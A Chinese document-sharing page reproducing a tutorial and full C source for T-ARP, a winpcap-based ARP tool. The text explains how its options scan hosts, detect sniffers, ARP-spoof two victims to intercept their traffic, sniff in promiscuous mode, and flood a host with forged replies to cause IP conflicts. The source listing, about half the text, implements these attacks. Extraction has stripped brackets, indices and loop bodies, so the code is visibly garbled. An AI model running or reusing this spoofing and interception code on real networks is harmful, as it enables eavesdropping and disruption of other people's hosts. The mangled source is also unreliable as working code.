10 元
下载资源

调用winpcap驱动写arp多功能工具1

上传人:沈*** 文档编号:102976157 上传时间:2022-06-07 格式:DOC 页数:23 大小:55.50KB
返回 下载 相关 举报
调用winpcap驱动写arp多功能工具1_第1页
第1页 / 共23页
调用winpcap驱动写arp多功能工具1_第2页
第2页 / 共23页
调用winpcap驱动写arp多功能工具1_第3页
第3页 / 共23页
点击查看更多>>
资源描述
. .详谈调用winpcap驱动写arp多功能工具详谈调用winpcap驱动写arp多功能工具 一 winpcap驱动简介二 Packet.dll相关数据构造及函数三 T-ARP功能及原理介绍四 T-ARP主要代码分析五 T-ARP源代码一winpcap驱动简介winpcap(windows packet capture)是windows平台下一个免费,公共的网络访问系统。开发winpcap这个工程的目的在于为win32应用程序提供访问网络底层的能力。它提供了以下的各项功能:1 捕获原始数据报,包括在共享网络上各主机发送/接收的以及相互之间交换的数据报;2 在数据报发往应用程序之前,按照自定义的规那么将某些特殊的数据报过滤掉;3 在网络上发送原始的数据报;4 收集网络通信过程中的统计信息。winpcap的主要功能在于独立于主机协议如TCP-IP)而发送和接收原始数据报。也就是说,winpcap不能阻塞,过滤或控制其他应用程序数据报的发收,它仅仅只是监听共享网络上传送的数据报。因此,它不能用于QoS调度程序或个人防火墙。目前,winpcap开发的主要对象是windows NT/2000/XP,这主要是因为在使用winpcap的用户中只有一小局部是仅使用windows 95/98/Me,并且M$也已经放弃了对win9x的开发。因此本文相关的程序T-ARP也是面向NT/2000/XP用户的。其实winpcap中的面向9x系统的概念和NT系统的非常相似,只是在某些实现上有点差异,比方说9x只支持ANSI编码,而NT系统那么提倡使用Unicode编码。本文讨论的是packet.dll所提供的各种函数,因为它们完全可以实现本文所希望的各项要求。但是如果你有其他特别的或更高级的要求,winpcap也提供了另一个动态连接库wpcap.dll。虽然wpcap.dll依靠于packet.dll,但是它却提供了一种更简单,直接,有力的方法来更好的利用编程环境。比方捕获一个数据报,创立一个数据报过滤装置或将监听到的数据报转存到某个文件等,wpcap.dll都会为你提供更加平安的实现方法。二Packet.dll相关数据构造及函数 本文的目的之一在于介绍如何利用winpcap驱动写ARP工具,因此有必要介绍一些相关的数据构造和函数,要不然看着一行行代码和函数,也许会有些不知所云。首先介绍一些相关的数据构造:1. typedef struct _ADAPTER ADAPTER /描述一个网络适配器;2. typedef struct _PACKET PACKET /描述一组网络数据报的构造;3. typedef struct NetType NetType /描述网络类型的数据构造;4. typedef struct npf_if_addr npf_if_addr /描述一个网络适配器的ip地址;5. struct bpf_hdr /数据报头部;6. struct bpf_stat /当前捕获数据报的统计信息。下面,将介绍T-ARP用到的各个函数,他们都是在packet.dll中定义的:1 LPPACKET PacketAllocatePacket(void)如果运行成功,返回一个_PACKET构造的指针,否那么返回NULL。成功返回的结果将会传送到PacketReceivePacket()函数,接收来自驱动的网络数据报。2 VOID PacketCloseAdapter(LPADAPTER lpAdapter)关闭参数中提供的网络适配器,释放相关的ADAPTER构造。3 VOID PacketFreePacket(LPPACKET lpPacket)释放参数提供的_PACKET构造。4 BOOLEAN PacketGetAdapterNames(LPSTR pStr,PULONG BufferSize)返回可以得到的网络适配器列表及描述。5 BOOLEAN PacketGetNetInfoEx(LPTSTR AdapterNames,npf_ip_addr *buff, PLONG NEntries)返回某个网络适配器的全面地址信息。其中npf_ip_addr构造包含:IPAddress,SubnetMask,BroadcastIPAddress: ip地址SubnetMask: 子网掩码Broadcast: 播送地址6 BOOLEAN PacketGetNetType(LPADAPTER AdapterObject, NetType *type)返回某个网络适配器的MAC类型。NetType构造里包含了LinkSpeed(速度和LinkType(类型。其中LinkType包含以下几种情况:NdisMedium802_3: Ethernet(802.3)NdisMediumWan: WANNdisMedium802_5: Token Ring(802.5)NdisMediumFddi: FDDINdisMediumAtm: ATMNdisMediumAret878_2: ARET(878.2)7 BOOLEAN PacketGetStats(LPADAPTER AdapterObject,struct bpf_stat *s)返回几个关于当前捕获报告的统计信息。其中bpf_stat构造包含:bs_recv, bs_drop,ps_ifdrop,bs_captbs_recv: 从网络适配器开场捕获数据报开场所接收到的所有数据报的数目,包括丧失的数据报;bs_drop: 丧失的数据报数目。在驱动缓冲区已经满时,就会发生数据报丧失的情况。8 PCHAR PacketGetVersion()返回关于dll的版本信息。9 VOID PacketInitPacket(LPPACKET lpPacket, PVOID Buffer, UINT Length)初始化一个_PACKET构造。10 LPADAPTER PacketOpetAdapter(LPTSTR AdapterName)翻开一个网络适配器。11 BOOLEAN PacketReceivePacket(LPADAPTER AdapterObject,LPPACKET lpPacket,BOOLEAN Sync)从NPF驱动程序读取网络数据报及统计信息。数据报编码构造: |bpf_hdr|data|Padding|bpf_hdr|data|Padding|12 BOOLEAN PacketSendPacket(LPADAPTER AdapterObject,LPPACKET lpPacket, BOOLEAN Sync)发送一个或多个数据报的副本。13 BOOLEAN PacketSetBuff(LPADAPTER AdapterObject,int dim)设置捕获数据报的内核级缓冲区大小。14 BOOLEAN PacketSetHwFilter(LPADAPTER AdapterObject,ULONG Filter)为接收到的数据报设置硬件过滤规那么。以下为一些典型的过滤规那么:NDIS_PACKET_TYPE_PROMISCUOUS: 设置为混杂模式,接收所有流过的数据报;NDIS_PACKET_TYPE_DIRECTED: 只有目的地为本地主机网络适配器的数据报才会被接收;NDIS_PACKET_TYPE_BROADCAST: 只有播送数据报才会被接收;NDIS_PACKET_TYPE_MULTICAST: 只有与本地主机网络适配器相对应的多播数据报才会被接收;NDIS_PACKET_TYPE_ALL_MULTICAST: 所有多播数据报均被接收;NDIS_PACKET_TYPE_ALL_LOCAL: 所有本地数据报均被接收。15 BOOLEAN PacketSetNumWrites(LPADAPTER AdapterObject,int nwrites)设置调用PacketSendPacket()函数发送一个数据报副本所重复的次数。三T-ARP功能及原理介绍准备工作: 1. 安装winpcap驱动,目前最新的版本为winpcap_3.0_alpha, 稳定版本为winpcap_2.3;2. 使用ARP欺骗功能前,必须启动ip路由功能,修改(添加)注册表选项: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParametersIPEnableRouter = 0x1选项: -m 主机扫描,获得局域网内指定ip段中存活主机的ip地址和mac地址;-a 反嗅探扫描,获得局域网内指定ip段中嗅探主机的ip地址和mac地址;-s ARP欺骗,欺骗局域网内指定的两台主机,使其相互发送接收的数据报均通过本地主机;网络嗅探,如果你选择欺骗的两台主机均是本地主机,那么将会监听到所有流过本地主机的数据报;IP冲突,如果你选择欺骗的两台主机是同一台非本地主机,那么就会发起ip冲突攻击;-r 重置被欺骗主机,使被欺骗的两台主机恢复正常的工作状态。原理及实现过程:无论什么选项,第一件事就是获得本地主机的mac地址及相关网络设置。我们以一个特殊的ip地址(112.112.112.112)向本地主机发送一个ARP Request(ARP请求)数据报,当本地主机接收到后,就会发送一个ARP Reply(ARP应答)数据报来回应请求,这样我们就可以获得本地主机的mac地址了。至于相关的网络设置可以通过PacketGetNetInfoEx()和PacketGetNetType()获得。-m 以本地主机的名义(本地主机的ip和mac)向指定ip网段内的所有主机发送播送(ff:ff:ff:ff:ff:ff)ARP Request数据报,存活的主机就会发送ARP Reply数据报,这样就可以获得当前存活主机的列表。因为在很多网关上都对ARP Request做了限制-非内网ip发送的ARP Request数据报不会得到网关的回应,如果你用内网的其他某台主机的ip来发送ARP Request数据报,如果填写的mac地址和相应的ip不合,就会出现ip冲突。所以最好还是用自己的ip和mac地址来发送请求。-a 以本地主机的名义(本地主机的ip和mac)向指定ip网段内的所有主机发送31位伪播送地址(ff:ff:ff:ff:ff:fe)的ARP Request数据报,只有正在嗅探的主机才会发送ARP Reply数据报,这样就可以获得当前存活主机的列表。嗅探中的win2000系统还会对16位伪播送地址(ff:ff:00:00:00:00)做出回应;而嗅探中的win95/98/me不仅会回应16位伪播送地址,而且也会回应8位伪播送地址(ff:00:00:00:00:00),而*NIX系统对各种播送地址所做出的反响却有些不同。在此我们选择31位伪播送地址,是因为绝大多数的系统在嗅探时都会对它做出回应。而正常状况下的各种系统,都不会对31位伪播送地址做出回应。-s (ARP欺骗spoof) 需要强调的是在某些局域网(如以太网)内,数据报的发送与接收是基于硬件地址的,这是我们实现欺骗的根底。首先获得指定的两台主机(假设为 A 和 B)的mac地址,然后向A发送ARP Reply数据报,其中的源ip地址为B的ip地址,但是源mac地址却是本地主机的mac地址,这样主机A就会认为主机B的mac地址是本地主机的mac地址,所以主机A发送到主机B的数据报都发送到本地主机了。同理向主机B发送ARP Reply数据报,通知它主机A的mac地址为本地主机的mac地址。这样主机A和主机B就会把目的主机的mac地址理解为本地主机的mac地址,于是他们之间相互发送的数据报都首先到达了本地主机,而先前我们已经将本地主机设置了ip路由功能,系统会自动将数据报转发到真正的目的主机。其间,你就可以监听它们通信的各种数据报了。-s (网络嗅探sniff) 如果指定的两个目的主机均为本地主机,那么就只是将网络适配器设置为混杂模式,这样就可以监听到流过本地主机网络适配器的各种数据。-s (ip冲突shock 如果你选择欺骗的两台主机是同一台非本地主机(假设是主机C),那么就会不断地向主机C发送ARP Reply数据报,报文中的源ip地址就是主机C的ip地址,但是源mac地址却是本地主机的mac地址,因此主机C就会发现有另一台主机同时拥有和自己一样的ip,这就是ip冲突攻击。如果是非xp系统,都会跳出一个ip冲突的提示窗口,而xp系统也会有类似的警告。但是请注意,在主机C的系统事件查看器中,会留下本地主机的mac地址与之冲突的恶心记录,所以你最好不要滥用这个功能。-r 在实现了ARP欺骗的情况下,向主机A和B发送ARP Reply数据报,通知主机A(B)注意主机B(A)的mac地址为主机B(A)自己的mac地址,这样主机A和B就会更新他们的ARP缓存,实现正常的数据通信。四T-ARP主要代码分析1 自定义函数:int getmine() /发送ARP Request数据报,请求获得本地主机的mac地址;void getdata(LPPACKET lp,int op) /分类处理接收到的数据报;DWORD WINAPI sniff(LPVOID no) /将网络适配器设置为混杂模式,接收所有流过的数据报;DWORD WINAPI sendMASR(LPVOID no) /发送ARP Request数据报,请求获得指定ip的mac地址;DWORD WINAPI sendSR(LPVOID no) /发送ARP Reply进展ARP欺骗,或是更新主机的ARP缓存。2 主要代码分析printf(nLibarary Version: %s,PacketGetVersion(); /输出dll的版本信息;PacketGetAdapterNames(char *)adaptername,&adapterlength) /获得本地主机的网络适配器列表和描述;lpadapter=PacketOpenAdapter(adapterlistopen-1); /翻开指定的网络适配器;PacketGetNetType(lpadapter,&ntype) /获得网络适配器的MAC类型;PacketGetNetInfoEx(adapterlistopen-1,&ipbuff,&npflen) /获得指定网络适配器的相关信息;rthread=CreateThread(NULL,0,sniff,(LPVOID)&opti,0,&threadrid); /创立一个新线程来监听网络数据报;PacketSetHwFilter(lpadapter,NDIS_PACKET_TYPE_PROMISCUOUS) /将网络适配器设置为混杂模式,这样才可以监听流过本地主机的数据报;PacketSetBuff(lpadapter,500*1024) /自定义网络适配器的内核缓的大小为 500*1024;PacketSetReadTimeout(lpadapter,1) /设置接收一个数据报后等待的时间为1毫秒;PacketReceivePacket(lpadapter,lppacketr,TRUE) /在设置为混杂模式后,接收所有的数据报;sthread=CreateThread(NULL,0,sendMASR,(LPVOID)&opti,0,&threadsid);sthread=CreateThread(NULL,0,sendSR,(LPVOID)&opti,0,&threadsid); /创立一个新线程发送特定的ARP数据报PacketSetNumWrites(lpadapter,2) /在发送一个数据报时,重复发送两次;PacketSendPacket(lpadapter,lppackets,TRUE) /发送自定义数据报;WaitForSingleObject(sthread,INFINITE); /等待发送ARP数据报的线程完毕;PacketGetStats(lpadapter,&stat) /获得网络适配器的统计信息;五) T-ARP源代码#include #include #include #include #pragma ment(lib,ws2_32)#pragma ment(lib,packet)#define ETH_IP 0x0800#define ETH_ARP 0x0806#define ARP_REQUEST 0x0001#define ARP_REPLY 0x0002#define ARP_HARDWARE 0x0001#define max_num_adapter 10#pragma pack(push,1)typedef struct ethdrunsigned char eh_dst6;unsigned char eh_src6;unsigned short eh_type;ETHDR,*PETHDR;typedef struct arphdrunsigned short arp_hdr;unsigned short arp_pro;unsigned char arp_hln;unsigned char arp_pln;unsigned short arp_opt;unsigned char arp_sha6;unsigned long arp_spa;unsigned char arp_tha6;unsigned long arp_tpa;ARPHDR,*PARPHDR;typedef struct iphdrunsigned char h_lenver;unsigned char tos;unsigned short total_len;unsigned short ident;unsigned short frag_and_flags;unsigned char ttl;unsigned char proto;unsigned short checksum;unsigned int sourceip;unsigned int destip;IPHDR,*PIPHDR;#pragma pack(push)LPADAPTER lpadapter=0;LPPACKET lppacketr,lppackets;ULONG myip,firstip,secondip;UCHAR mmac6=0,fmac6=0,smac6=0;BOOL mm=FALSE,fm=FALSE,sm=FALSE; FILE *fp; char adapterlistmax_num_adapter1024;char msg50;int num=0;void start()printf(T-ARP - ARP Tools, by TOo2y(1?), 11-9-2002n);printf(Homepage: n);printf(: TOn);return ;void usage()printf(nUsage: T-ARP -m|-a|-s|-r firstip secondip nn);printf(Option:n);printf( -m mac Get the mac address from firstip to secondipn);printf( -a antisniff Get the sniffing host from firstip to secondipn);printf( -s spoof 1 Spoof the host between firstip and secondipn);printf( sniff 2 Sniff if firstip = secondip = your own ipn);printf( shock 3 Shock if firstip = secondip != your own ipn);printf( -r reset Reset the spoofed host work normallynn);printf(Attention:n);printf( 1 You must have installed the winpcap_2.3 or winpcap_3.0_alphan);printf( 2 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParametersIPEnableRouter=0x1nn);return ;int getmine()char sendbuf1024;int k;ETHDR eth;ARPHDR arp;for(k=0;kulBytesReceived;buf=(char *)lp-Buffer;off=0;while(offbh_hdrlen;pChar=(char *)(buf+off);base=pChar;off=Packet_WORDALIGN(off+hdr-bh_caplen);eth=(PETHDR)pChar; arp=(PARPHDR)(pChar+sizeof(ETHDR); if(eth-eh_type=htons(ETH_IP) ip=(PIPHDR)(pChar+sizeof(ETHDR);if(fm & sm & (op=3) if(ip-sourceip!=htonl(myip) & (ip-destip!=htonl(myip) & !strcmp(char *)eth-eh_dst,(char *)mmac) & (ip-sourceip=htonl(firstip) | (ip-destip=htonl(firstip) | (ip-sourceip=htonl(secondip) | (ip-destip=htonl(secondip)| (firstip=myip) & (secondip=myip)memset(msg,0,sizeof(msg);sin.sin_addr.s_addr=ip-sourceip; printf(IP:%16s - IP:,inet_ntoa(sin.sin_addr);strcpy(msg,inet_ntoa(sin.sin_addr);strcat(msg+15, - );sin.sin_addr.s_addr=ip-destip;printf(%16sn,inet_ntoa(sin.sin_addr);strcat(msg+23,inet_ntoa(sin.sin_addr);fseek(fp,-2,1);fwrite(rnrnrn,6,1,fp);fwrite(msg,38,1,fp);fwrite(rn,2,1,fp);ulLines=(hdr-bh_caplen+15)/16;for(k=0;k16) ? 16 : ulen;tlen-=ulen;for(j=0;julen;j+)printf(%02x ,*(BYTE *)pChar+);if(ulen16)printf(%*s,(16-ulen)*3, );pChar=pLine;for(j=0;jeh_type=htons(ETH_ARP) & (arp-arp_opt=htons(ARP_REPLY) sin.sin_addr.s_addr=arp-arp_spa;if(sin.sin_addr.s_addr=htonl(myip) memcpy(mmac,eth-eh_src,6);if(!mm)printf(t); for(k=0;keh_srck);printf(%.2xn,eth-eh_src5);switch(op)case 1:printf(nMAC LIST:);break;case 2:printf(nSniffing Host:); break;default: break;mm=TRUE;if(op=1) | (op=2)printf(nIP: %.16s MAC: ,inet_ntoa(sin.sin_addr);for(k=0;keh_srck);printf(%.2x,eth-eh_src5);else if(op=3) | (op=4) & (!fm | !sm)if(arp-arp_spa=htonl(firstip)memcpy(fmac,eth-eh_src,6);fm=TRUE;if(arp-arp_spa=htonl(secondip)memcpy(smac,eth-eh_src,6);sm=TRUE;return ;DWORD WINAPI sniff(LPVOID no)int option=*(int *)no;char recvbuf1024*250;if(PacketSetHwFilter(lpadapter,NDIS_PACKET_TYPE_PROMISCUOUS)=FALSE)printf(Warning: Unable to set the adapter to promiscuous moden);if(PacketSetBuff(lpadapter,500*1024)=FALSE)printf(PacketSetBuff Error: %dn,GetLastError();return -1;if(PacketSetReadTimeout(lpadapter,1)=FALSE)printf(Warning: Unable to set the timeoutn);if(lppacketr=PacketAllocatePacket()=FALSE)printf(PacketAllocatePacket receive Error: %dn,GetLastError();return -1;PacketInitPacket(lppacketr,(char *)recvbuf,sizeof(recvbuf);while(!kbhit()if(PacketReceivePacket(lpadapter,lppacketr,TRUE)=FALSE)if(GetLastError()=6)return 0;printf(PacketReceivePacket Error: %dn,GetLastError();return -1;getdata(lppacketr,option);return 0;DWORD WINAPI sendMASR(LPVOID no)int fun=*(int *)no;int k,stimes;char sendbuf1024;ETHDR eth;ARPHDR arp;if(fun4)return -1;elsefor(k=0;k6;k+)eth.eh_dstk=0xff;arp.arp_thak=0x00;if(fun=2)eth.eh_dst5=0xfe;memcpy(eth.eh_src,mmac,6);eth.eh_type=htons(ETH_ARP);arp.arp_hdr=htons(ARP_HARDWARE);arp.arp_pro=htons(ETH_IP);arp.arp_hln=6;arp.arp_pln=4;arp.arp_opt=htons(ARP_REQUEST);arp.arp_spa=htonl(myip);memcpy(arp.arp_sha,mmac,6);if(fun=1 | fun=2)stimes=1;else if(fun=3 | fun=4)stimes=2;for(k=0;kstimes;k+)if(stimes=1)arp.arp_tpa=htonl(firstip+(num+);else if(stimes=2)switch(k)case 0:arp.arp_tpa=htonl(firstip);break;case 1:arp.arp_tpa=htonl(secondip);break;default:break;memset(sendbuf,0,sizeof(sendbuf);memcpy(sendbuf,sizeof(eth);memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp);PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp);if(PacketSendPacket(lpadapter,lppackets,TRUE)=FALSE)printf(PacketSendPacket in sendMASR Error: %dn,GetLastError();return -1;return 0;DWORD WINAPI sendSR(LPVOID no)int fun=*(int *)no;int j,k;char sendbuf1024;struct sockaddr_in fsin,ssin;BOOL stimes=FALSE;ETHDR eth;ARPHDR arp;fsin.sin_addr.s_addr=htonl(firstip);ssin.sin_addr.s_addr=htonl(secondip);eth.eh_type=htons(ETH_ARP);arp.arp_hdr=htons(ARP_HARDWARE);arp.arp_pro=htons(ETH_IP);arp.arp_hln=6;arp.arp_pln=4;arp.arp_opt=htons(ARP_REPLY); if(fun=3)if(mm)if(firstip=myip) & (secondip=myip)fm=TRUE;sm=TRUE;memcpy(fmac,mmac,6);memcpy(smac,mmac,6);else if(!fm | !sm)printf(nNot get enough datan); return -1;for(j=0;j ,inet_ntoa(ssin.sin_addr);else if(j=1)printf(Spoofing %.16s : ,inet_ntoa(ssin.sin_addr);printf(%.16s = ,inet_ntoa(fsin.sin_addr);for(k=0;k ,inet_ntoa(ssin.sin_addr);for(k=0;k ,inet_ntoa(fsin.sin_addr);for(k=0;k5;k+)printf(%.2x-,fmack);printf(%.2xnn,fmac5);stimes=FALSE;else printf(nNot get enough datan); return -1;elsereturn -1;domemcpy(eth.eh_dst,fmac,6);memcpy(arp.arp_tha,fmac,6);arp.arp_tpa=htonl(firstip);arp.arp_spa=htonl(secondip);if(!stimes)memcpy(eth.eh_src,smac,6);memcpy(arp.arp_sha,smac,6);elsememcpy(eth.eh_src,mmac,6);memcpy(arp.arp_sha,mmac,6);memset(sendbuf,0,sizeof(sendbuf);memcpy(sendbuf,sizeof(eth);memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp);PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp);if(PacketSetNumWrites(lpadapter,2)=FALSE)printf(Warning: Unable to send a packet 2 timesn);if(PacketSendPacket(lpadapter,lppackets,TRUE)=FALSE)printf(PacketSendPacket in SendSR Error: %dn,GetLastError();return -1;Sleep(1000); memcpy(eth.eh_dst,smac,6);memcpy(arp.arp_tha,smac,6);arp.arp_tpa=htonl(secondip);arp.arp_spa=htonl(firstip);if(!stimes)memcpy(eth.eh_src,fmac,6);memcpy(arp.arp_sha,fmac,6);else memcpy(eth.eh_src,mmac,6);memcpy(arp.arp_sha,mmac,6);memset(sendbuf,0,sizeof(sendbuf);memcpy(sendbuf,sizeof(eth);memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp);PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp);if(PacketSendPacket(lpadapter,lppackets,TRUE)=FALSE)printf(PacketSendPacket int sendSR Error: %dn,GetLastError();return -1;Sleep(1000);while(stimes);if(fun=4)printf(Reset Successfully);return 0;int main(int argc,char *argv)HANDLE sthread,rthread;WCHAR adaptername8192;WCHAR *name1,*name2;ULONG adapterlength;DWORD threadsid,threadrid;struct NetType ntype;struct bpf_stat stat;struct sockaddr_in sin;struct npf_if_addr ipbuff;int adapternum=0,opti=0,open,i,total;long npflen;system(cls.exe);start();if(argc!=4)usage();getche();return -1;elseif(!strcmp(argv1,-m)opti=1;else if(!strcmp(argv1,-a)opti=2;else if(!strcmp(argv1,-s)opti=3;if(fp=fopen(capture.txt,w+)=NULL)printf(Open capture.txt Error: %dn);return -1;elsefwrite(T-ARP Captrue Data,20,1,fp);else if(!strcmp(argv1,-r)opti=4;elseusage();getche();return -1;firstip=ntohl(inet_addr(argv2);secondip=ntohl(inet_addr(argv3);total=secondip-firstip+1;printf(nLibarary Version: %s,PacketGetVersion();adapterlength=sizeof(adaptername);if(PacketGetAdapterNames(char *)adaptername,&adapterlength)=FALSE)printf(PacketGetAdapterNames Error: %dn,GetLastError();return -1;name1=adaptername;name2=adaptername;i=0;while(*name1!=0) | (*(name1-1)!=0)if(*name1=0)memcpy(adapterlist,name2,2*(name1-name2);name2=name1+1;i+;name1+;adapternum=i;printf(nAdapters Installed:n);for(i=0;i=1 & open=adapternum)break; while(openadapternum);lpadapter=PacketOpenAdapter(adapterlistopen-1);if(!lpadapter | (lpadapter-hFile=INVALID_HANDLE_VALUE)printf(PacketOpenAdapter Error: %dn,GetLastError();return -1;if(PacketGetNetType(lpadapter,&ntype)printf(ntt* Host Information *n);printf(LinkTpye:t%dtt,ntype.LinkType); printf(LinkSpeed:t%d b/sn,ntype.LinkSpeed);npflen=sizeof(ipbuff); if(PacketGetNetInfoEx(adapterlistopen-1,&ipbuff,&npflen)sin=*(struct sockaddr_in *)&(ipbuff.Broadcast);printf(Broadcast:t%.16st,inet_ntoa(sin.sin_addr);
展开阅读全文
相关资源
相关搜索

最新文档


当前位置:首页 > 办公文档 > 工作计划


copyright@ 2023-2025  zhuangpeitu.com 装配图网版权所有   联系电话:18123376007

备案号:ICP2024067431-1 川公网安备51140202000466号


本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。装配图网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知装配图网,我们立即给予删除!